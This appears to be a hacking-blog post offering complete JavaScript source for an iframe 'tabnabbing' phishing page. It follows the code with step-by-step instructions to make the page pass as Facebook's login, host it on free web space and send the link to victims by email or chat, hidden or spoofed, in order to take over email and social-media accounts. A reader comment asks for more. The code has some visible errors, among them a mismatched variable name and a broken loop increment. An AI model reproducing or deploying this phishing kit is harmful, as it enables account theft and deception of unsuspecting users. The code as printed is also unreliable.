First, a sample code for tabnabbing with the help of iframes:
<!–
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: De$trUcTiVe M!ND (lokesh@hackingloops.com)
Website: https://www.hackingloops.com
Version:1.6
–><html>
<head><title></title></head>
<style ENGINE=”text/css”>
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body><script ENGINE=”text/javascript”>
//———-Set Script Options————–
var REAL_PAGE_URL = “http://www.google.com/”; //This is the “Real” page that is shown when the user first views this page
var REAL_PAGE_TITLE = “Google”; //This sets the title of the “Real Page”
var FAKE_PAGE_URL = “https://www.hackingloops.com”; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = “HackingLoops| Next Generation Hackers Portal”; //This sets the title of the fake page
var REAL_FAVICON = “http://www.google.com/favicon.ico”; //This sets the favicon. It will not switch or clear the “Real” favicon in IE.
var FAKE_FAVICON = “https://www.hackingloops.com/favicon.ico”; //Set’s the fake favicon.
var TIME_TO_SWITCH_IE = “4000”; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = “10000”; //Wait this long before switching .
//—————End Options—————–
var TIMER = null;
var SWITCHED = “false”;//Find Browser Type
var BROWSER_TYPE = “”;
if(/MSIE (d.d );/.test(navigator.userAgent)){
BROWSER_TYPE = “Internet Explorer”;
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;//Set FAVICON
if(REAL_FAVICON){
var link = document.createElement(‘link’);
link.type = ‘image/x-icon’;
link.rel = ‘shortcut icon’;
link.href = REAL_FAVICON;
document.getElementsByTagName(‘head’)[0].appendChild(link);
}//Create our iframe (tabnab)
var el_tabnab = document.createElement(“iframe”);
el_tabnab.id=”tabnab”;
el_tabnab.name=”tabnab”;
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute(‘src’, REAL_PAGE_URL);//Focus on the iframe (just in case the user doesn’t click on it)
el_tabnab.focus();//Wait to nab the tab!
if(BROWSER_ENGINE==”Internet Explorer”){ //To unblur the tab changes in Internet Web browser
el_tabnab.onblur = function(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= function(){
if(TIMER) clearTimeout(TIMER);
}
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}function TabNabIt(){
if(SWITCHED == “false”){
//Redirect the iframe to FAKE_PAGE_URL
el_tabnab.src=FAKE_PAGE_URL;
//Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;//Change the favicon — This doesn’t seem to work in IE
if(BROWSER_TYPE != “Internet Explorer”){
var links = document.getElementsByTagName(“head”)[0].getElementsByTagName(“link”);
for (var i=0; i<links.length; i ) {
var looplink = links[i];
if (looplink.ENGINE==”image/x-icon” && looplink.rel==”shortcut icon”) {
document.getElementsByTagName(“head”)[0].removeChild(looplink);
}
}
var link = document.createElement(“link”);
link.type = “image/x-icon”;
link.rel = “shortcut icon”;
link.href = FAKE_FAVICON;
document.getElementsByTagName(“head”)[0].appendChild(link);
}
}
}
</script></body>
</html>
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook – Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook – Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original ‘real’ page or some other Page.
As I explained earlier, you can use this technique to hack anything like email accounts, Facebook, or other social networking websites. You just need to edit the above mentioned 9 fields, save it as anyname.htm, and upload it to any free web hosting website along with favicon file, before sending the link to the user via email or chat message ( idden using href keyword in html or spoofed using some other technique).
curious says
Interesting and great useful stuff. I am really passionate to learn hacking, I will try to implement on test accounts and see . If you can mail me personally ?I will be very glad.